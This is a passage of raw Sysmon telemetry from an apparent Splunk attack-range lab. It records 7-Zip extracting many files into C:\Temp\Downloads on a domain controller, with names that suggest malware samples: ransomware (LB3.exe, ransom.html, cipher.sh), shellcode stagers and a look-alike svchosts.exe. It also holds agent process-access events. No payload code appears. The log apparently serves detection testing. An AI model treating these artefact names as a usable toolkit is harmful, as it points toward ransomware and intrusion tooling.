Files\7-Zip\7zG.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+2c44d|C:\Windows\System32\SHELL32.dll+897d4|C:\Windows\System32\SHELL32.dll+8a387|C:\Windows\Explorer.EXE+3c648|C:\Windows\Explorer.EXE+3c4d4|C:\Windows\Explorer.EXE+3c441|C:\Windows\System32\windows.storage.dll+12703f|C:\Windows\System32\windows.storage.dll+125dbf|C:\Windows\System32\windows.storage.dll+19d7df|C:\Windows\System32\SHCORE.dll+367b6|C:\Windows\SYSTEM32\ntdll.dll+39d09|C:\Windows\SYSTEM32\ntdll.dll+1e89a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 23542300x800000000000000040171Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:17:57.301{FE4C2B44-DA75-63C7-F400-00000000AF02}2900NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=E296F6F7C9B252DB45A5D5C45ABF8F42,SHA256=2E4B28B2E9CC217BEB5B8A82C708CB05B05C2FBBE7B12F872A82F55B93CA7375,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000015370Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:17:57.037{E5A8D418-DCCE-63C7-EB00-00000000B002}3756NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=0EFAFA72B74D795B452C6BC05E2EBA0D,SHA256=FA9A26B4DAABFCB057727B13A49084EDD8ED55A2BA3D1705F7D0A394AC5D0556,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000040217Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:17:58.621{FE4C2B44-DA75-63C7-F400-00000000AF02}2900NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=B5BE6BC7B2C261A044D9591D92B79A95,SHA256=7FB674CC479C3FB87276D48F18A0F820AC01F83432389E098B344E149980FFF2,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000015371Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:17:58.124{E5A8D418-DCCE-63C7-EB00-00000000B002}3756NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=78771D50D6D8FC4D977900AB80460590,SHA256=9605D2CF832306530A944BB6BAB842BFCE74B62F57F092D7F23D734112976C47,IMPHASH=00000000000000000000000000000000falsetrue 11241100x800000000000000040216Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.localDownloads2023-01-18 12:17:58.206{FE4C2B44-E372-63C7-0806-00000000AF02}6964C:\Program Files\7-Zip\7zG.exeC:\Temp\Downloads\VerifyIdentity.exe2023-01-18 12:17:58.206 11241100x800000000000000040215Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.localDownloads2023-01-18 12:17:58.206{FE4C2B44-E372-63C7-0806-00000000AF02}6964C:\Program Files\7-Zip\7zG.exeC:\Temp\Downloads\svchosts.exe2023-01-18 12:17:58.206 11241100x800000000000000040214Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.localDownloads2023-01-18 12:17:58.191{FE4C2B44-E372-63C7-0806-00000000AF02}6964C:\Program Files\7-Zip\7zG.exeC:\Temp\Downloads\svchost.exe2023-01-18 12:17:58.191 11241100x800000000000000040213Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.localDownloads2023-01-18 12:17:58.191{FE4C2B44-E372-63C7-0806-00000000AF02}6964C:\Program Files\7-Zip\7zG.exeC:\Temp\Downloads\PowerPoint3to4.exe2023-01-18 12:17:58.191 11241100x800000000000000040212Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.localDownloads2023-01-18 12:17:58.191{FE4C2B44-E372-63C7-0806-00000000AF02}6964C:\Program Files\7-Zip\7zG.exeC:\Temp\Downloads\passwordstorageFix.exe2023-01-18 12:17:58.191 11241100x800000000000000040211Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.localDownloads2023-01-18 12:17:58.191{FE4C2B44-E372-63C7-0806-00000000AF02}6964C:\Program Files\7-Zip\7zG.exeC:\Temp\Downloads\LB3_Rundll32.dll2023-01-18 12:17:58.191 11241100x800000000000000040210Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.localDownloads2023-01-18 12:17:58.191{FE4C2B44-E372-63C7-0806-00000000AF02}6964C:\Program Files\7-Zip\7zG.exeC:\Temp\Downloads\LB3.exe2023-01-18 12:17:58.191 11241100x800000000000000040209Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.localDownloads2023-01-18 12:17:58.191{FE4C2B44-E372-63C7-0806-00000000AF02}6964C:\Program Files\7-Zip\7zG.exeC:\Temp\Downloads\googleDriveDesktopAlbum14.exe2023-01-18 12:17:58.191 11241100x800000000000000040208Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.localDownloads2023-01-18 12:17:58.191{FE4C2B44-E372-63C7-0806-00000000AF02}6964C:\Program Files\7-Zip\7zG.exeC:\Temp\Downloads\ConfirmEmail.exe2023-01-18 12:17:58.191 11241100x800000000000000040207Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.localDownloads2023-01-18 12:17:58.175{FE4C2B44-E372-63C7-0806-00000000AF02}6964C:\Program Files\7-Zip\7zG.exeC:\Temp\Downloads\8082-x86.exe2023-01-18 12:17:58.175 11241100x800000000000000040206Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.localDownloads2023-01-18 12:17:58.175{FE4C2B44-E372-63C7-0806-00000000AF02}6964C:\Program Files\7-Zip\7zG.exeC:\Temp\Downloads\8082-x86.dll2023-01-18 12:17:58.175 11241100x800000000000000040205Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.localDownloads2023-01-18 12:17:58.175{FE4C2B44-E372-63C7-0806-00000000AF02}6964C:\Program Files\7-Zip\7zG.exeC:\Temp\Downloads\8082-x64.exe2023-01-18 12:17:58.175 11241100x800000000000000040204Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.localDownloads2023-01-18 12:17:58.175{FE4C2B44-E372-63C7-0806-00000000AF02}6964C:\Program Files\7-Zip\7zG.exeC:\Temp\Downloads\8082-x64.dll2023-01-18 12:17:58.175 11241100x800000000000000040203Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.localDownloads2023-01-18 12:17:58.175{FE4C2B44-E372-63C7-0806-00000000AF02}6964C:\Program Files\7-Zip\7zG.exeC:\Temp\Downloads\8082-svc-x86.exe2023-01-18 12:17:58.175 11241100x800000000000000040202Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.localDownloads2023-01-18 12:17:58.175{FE4C2B44-E372-63C7-0806-00000000AF02}6964C:\Program Files\7-Zip\7zG.exeC:\Temp\Downloads\8082-svc-x64.exe2023-01-18 12:17:58.175 11241100x800000000000000040201Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.localDownloads2023-01-18 12:17:58.034{FE4C2B44-E372-63C7-0806-00000000AF02}6964C:\Program Files\7-Zip\7zG.exeC:\Temp\Downloads\WoundedGryphon.sh2023-01-18 12:17:58.034 11241100x800000000000000040200Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.localDownloads2023-01-18 12:17:58.034{FE4C2B44-E372-63C7-0806-00000000AF02}6964C:\Program Files\7-Zip\7zG.exeC:\Temp\Downloads\whiteKey2023-01-18 12:17:58.034 11241100x800000000000000040199Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.localDownloads2023-01-18 12:17:58.034{FE4C2B44-E372-63C7-0806-00000000AF02}6964C:\Program Files\7-Zip\7zG.exeC:\Temp\Downloads\whiteDecipher.sh2023-01-18 12:17:58.034 11241100x800000000000000040198Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.localDownloads2023-01-18 12:17:58.034{FE4C2B44-E372-63C7-0806-00000000AF02}6964C:\Program Files\7-Zip\7zG.exeC:\Temp\Downloads\whiteCipher2023-01-18 12:17:58.034 11241100x800000000000000040197Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.localDownloads2023-01-18 12:17:58.034{FE4C2B44-E372-63C7-0806-00000000AF02}6964C:\Program Files\7-Zip\7zG.exeC:\Temp\Downloads\VerifyIdentity.zip2023-01-18 12:17:58.034 11241100x800000000000000040196Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.localDownloads2023-01-18 12:17:58.034{FE4C2B44-E372-63C7-0806-00000000AF02}6964C:\Program Files\7-Zip\7zG.exeC:\Temp\Downloads\READ_THIS.txt2023-01-18 12:17:58.034 11241100x800000000000000040195Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.localDownloads2023-01-18 12:17:58.034{FE4C2B44-E372-63C7-0806-00000000AF02}6964C:\Program Files\7-Zip\7zG.exeC:\Temp\Downloads\README.md2023-01-18 12:17:58.034 11241100x800000000000000040194Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.localDownloads2023-01-18 12:17:58.034{FE4C2B44-E372-63C7-0806-00000000AF02}6964C:\Program Files\7-Zip\7zG.exeC:\Temp\Downloads\RDP_MSP_INSTALL_SCRIPTS-AWESOME.txt2023-01-18 12:17:58.034 11241100x800000000000000040193Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.localDownloads2023-01-18 12:17:58.034{FE4C2B44-E372-63C7-0806-00000000AF02}6964C:\Program Files\7-Zip\7zG.exeC:\Temp\Downloads\ransom.html2023-01-18 12:17:58.034 11241100x800000000000000040192Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.localDownloads2023-01-18 12:17:58.034{FE4C2B44-E372-63C7-0806-00000000AF02}6964C:\Program Files\7-Zip\7zG.exeC:\Temp\Downloads\PlayServicesUpdate.apk2023-01-18 12:17:58.034 11241100x800000000000000040191Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.localDownloads2023-01-18 12:17:58.034{FE4C2B44-E372-63C7-0806-00000000AF02}6964C:\Program Files\7-Zip\7zG.exeC:\Temp\Downloads\output.pdf2023-01-18 12:17:58.034 11241100x800000000000000040190Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.localDownloads2023-01-18 12:17:58.034{FE4C2B44-E372-63C7-0806-00000000AF02}6964C:\Program Files\7-Zip\7zG.exeC:\Temp\Downloads\output.html2023-01-18 12:17:58.034 11241100x800000000000000040189Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.localDownloads2023-01-18 12:17:58.034{FE4C2B44-E372-63C7-0806-00000000AF02}6964C:\Program Files\7-Zip\7zG.exeC:\Temp\Downloads\LICENSE-WhiteBox.txt2023-01-18 12:17:58.019 11241100x800000000000000040188Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.localDownloads2023-01-18 12:17:58.019{FE4C2B44-E372-63C7-0806-00000000AF02}6964C:\Program Files\7-Zip\7zG.exeC:\Temp\Downloads\hoax.txt2023-01-18 12:17:58.019 11241100x800000000000000040187Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.localDownloads2023-01-18 12:17:58.019{FE4C2B44-E372-63C7-0806-00000000AF02}6964C:\Program Files\7-Zip\7zG.exeC:\Temp\Downloads\desktop.ini2023-01-18 12:17:58.019 11241100x800000000000000040186Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.localDownloads2023-01-18 12:17:58.019{FE4C2B44-E372-63C7-0806-00000000AF02}6964C:\Program Files\7-Zip\7zG.exeC:\Temp\Downloads\decipher.sh2023-01-18 12:17:58.019 11241100x800000000000000040185Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.localDownloads2023-01-18 12:17:58.019{FE4C2B44-E372-63C7-0806-00000000AF02}6964C:\Program Files\7-Zip\7zG.exeC:\Temp\Downloads\cipher.sh2023-01-18 12:17:58.019 11241100x800000000000000040184Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.localDownloads2023-01-18 12:17:58.019{FE4C2B44-E372-63C7-0806-00000000AF02}6964C:\Program Files\7-Zip\7zG.exeC:\Temp\Downloads\bg.jpg2023-01-18 12:17:58.019 11241100x800000000000000040183Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.localDownloads2023-01-18 12:17:58.019{FE4C2B44-E372-63C7-0806-00000000AF02}6964C:\Program Files\7-Zip\7zG.exeC:\Temp\Downloads\anubis.sh2023-01-18 12:17:58.019 11241100x800000000000000040182Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.localDownloads2023-01-18 12:17:58.019{FE4C2B44-E372-63C7-0806-00000000AF02}6964C:\Program Files\7-Zip\7zG.exeC:\Temp\Downloads\8082-x86.py2023-01-18 12:17:58.019 11241100x800000000000000040181Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.localDownloads2023-01-18 12:17:58.019{FE4C2B44-E372-63C7-0806-00000000AF02}6964C:\Program Files\7-Zip\7zG.exeC:\Temp\Downloads\8082-x86.ps12023-01-18 12:17:58.019 11241100x800000000000000040180Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.localDownloads2023-01-18 12:17:58.019{FE4C2B44-E372-63C7-0806-00000000AF02}6964C:\Program Files\7-Zip\7zG.exeC:\Temp\Downloads\8082-x64.py2023-01-18 12:17:58.019 11241100x800000000000000040179Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.localDownloads2023-01-18 12:17:58.019{FE4C2B44-E372-63C7-0806-00000000AF02}6964C:\Program Files\7-Zip\7zG.exeC:\Temp\Downloads\8082-x64.ps12023-01-18 12:17:58.019 11241100x800000000000000040178Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.localDownloads2023-01-18 12:17:58.019{FE4C2B44-E372-63C7-0806-00000000AF02}6964C:\Program Files\7-Zip\7zG.exeC:\Temp\Downloads\8082-thread-x86.bin2023-01-18 12:17:58.019 11241100x800000000000000040177Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.localDownloads2023-01-18 12:17:58.019{FE4C2B44-E372-63C7-0806-00000000AF02}6964C:\Program Files\7-Zip\7zG.exeC:\Temp\Downloads\8082-thread-x64.bin2023-01-18 12:17:58.019 11241100x800000000000000040176Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.localDownloads2023-01-18 12:17:58.019{FE4C2B44-E372-63C7-0806-00000000AF02}6964C:\Program Files\7-Zip\7zG.exeC:\Temp\Downloads\8082-process-x86.bin2023-01-18 12:17:58.019 11241100x800000000000000040175Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.localDownloads2023-01-18 12:17:58.019{FE4C2B44-E372-63C7-0806-00000000AF02}6964C:\Program Files\7-Zip\7zG.exeC:\Temp\Downloads\8082-process-x64.bin2023-01-18 12:17:58.019 23542300x800000000000000040219Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:17:59.823{FE4C2B44-DA67-63C7-AA00-00000000AF02}2092NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunkd.exeC:\Program Files\SplunkUniversalForwarder\var\spool\splunk\tracker.logMD5=FFFD291B0C60A507F36036FFD84E871E,SHA256=C0945FDCF881C3B537AB41E279188CC65AC4ACAC486ECFDD1A776E54865B00E2,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000040218Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:17:59.792{FE4C2B44-DA75-63C7-F400-00000000AF02}2900NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=CAB0ABBDF9DEB3427CD0BFD147B46EC0,SHA256=44977096A91B2B6F1D85F00C57F4157DE0473C3A8D289F97E3E5E9A6E389FB0F,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000015372Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:17:59.216{E5A8D418-DCCE-63C7-EB00-00000000B002}3756NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=9B47EB3A892D6F1418C2047DD2D78E50,SHA256=34D12B998BBC24495C7EC717FA2B1C608A8CD28FFDDC7A84ED536318A7BA8C07,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000040220Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:18:00.878{FE4C2B44-DA75-63C7-F400-00000000AF02}2900NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=AF62B76A83674036A0B7F0D771B1BFEE,SHA256=8EDCB5AD4415B66858FB7359AE266D223D21396C4CF23F6373FFAA014514CEB3,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 354300x800000000000000015374Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:17:59.111{E5A8D418-DCC7-63C7-D000-00000000B002}3144C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-ctus-attack-range-933.us-east-2.compute.internal50048-false10.0.1.12ip-10-0-1-12.us-east-2.compute.internal8000- 23542300x800000000000000015373Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:18:00.298{E5A8D418-DCCE-63C7-EB00-00000000B002}3756NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=7AF3130F34FCB39C6E5E5E7F1574CC32,SHA256=92F7F55EAD6094CB90E95A58D7838B47E0C57F29E413F6BB128A76F3B050DB99,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000040222Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:18:01.978{FE4C2B44-DA75-63C7-F400-00000000AF02}2900NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=B4E74421F178DDCC7133A4567AFB78CA,SHA256=5D41E4C5CA7B2EB6335980A2C7DD370C28703DC70FF73F456B06DCA5275DF67C,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000015376Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:18:01.444{E5A8D418-DCC0-63C7-9F00-00000000B002}3096NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunkd.exeC:\Program Files\SplunkUniversalForwarder\var\spool\splunk\tracker.logMD5=7CCA88BF42BB1AE055C7496B2F3C147D,SHA256=4C9E28BF008F67057EBABE5BA09E8E18CD7149DB9B11AA271B1050095364EC94,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000015375Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:18:01.382{E5A8D418-DCCE-63C7-EB00-00000000B002}3756NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=268346B7250058C028DC288D8D3FFCEE,SHA256=2D771DF360C8D66F562AA014D42FD6A3C67BF182D586670CF7DF07257107C13F,IMPHASH=00000000000000000000000000000000falsetrue 354300x800000000000000040221Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:17:58.740{FE4C2B44-DA6F-63C7-DB00-00000000AF02}4048C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-ctus-attack-range-271.attackrange.local56238-false10.0.1.12-8000- 10341000x800000000000000015408Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:18:02.743{E5A8D418-DC44-63C7-1C00-00000000B002}20203056C:\Program Files\Aurora-Agent\aurora-agent.exe{E5A8D418-DCCE-63C7-EB00-00000000B002}3756C:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(0000000013100850) 10341000x800000000000000015407Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:18:02.738{E5A8D418-DC44-63C7-1C00-00000000B002}20203056C:\Program Files\Aurora-Agent\aurora-agent.exe{E5A8D418-DCC7-63C7-D000-00000000B002}3144C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(0000000013100850) 10341000x800000000000000015406Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:18:02.737{E5A8D418-DC44-63C7-1C00-00000000B002}20203056C:\Program Files\Aurora-Agent\aurora-agent.exe{E5A8D418-DCC0-63C7-A300-00000000B002}968C:\Windows\system32\conhost.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(0000000013100850) 10341000x800000000000000015405Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:18:02.733{E5A8D418-DC44-63C7-1C00-00000000B002}20203056C:\Program Files\Aurora-Agent\aurora-agent.exe{E5A8D418-DCC0-63C7-9F00-00000000B002}3096C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(0000000013100850) 10341000x800000000000000015404Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:18:02.729{E5A8D418-DC44-63C7-1C00-00000000B002}20203056C:\Program Files\Aurora-Agent\aurora-agent.exe{E5A8D418-DCBE-63C7-9400-00000000B002}4004C:\Windows\System32\msdtc.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(0000000013100850) 10341000x800000000000000015403Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:18:02.728{E5A8D418-DC44-63C7-1C00-00000000B002}20203056C:\Program Files\Aurora-Agent\aurora-agent.exe{E5A8D418-DC4A-63C7-5300-00000000B002}3348C:\Windows\system32\conhost.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(0000000013100850) 10341000x800000000000000015402Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:18:02.728{E5A8D418-DC44-63C7-1C00-00000000B002}20203056C:\Program Files\Aurora-Agent\aurora-agent.exe{E5A8D418-DC4A-63C7-5200-00000000B002}3336C:\Windows\system32\WinrsHost.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(0000000013100850) 10341000x800000000000000015401Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:18:02.725{E5A8D418-DC44-63C7-1C00-00000000B002}20203056C:\Program Files\Aurora-Agent\aurora-agent.exe{E5A8D418-DC47-63C7-3E00-00000000B002}344C:\Windows\system32\wbem\wmiprvse.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(0000000013100850) 10341000x800000000000000015400Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 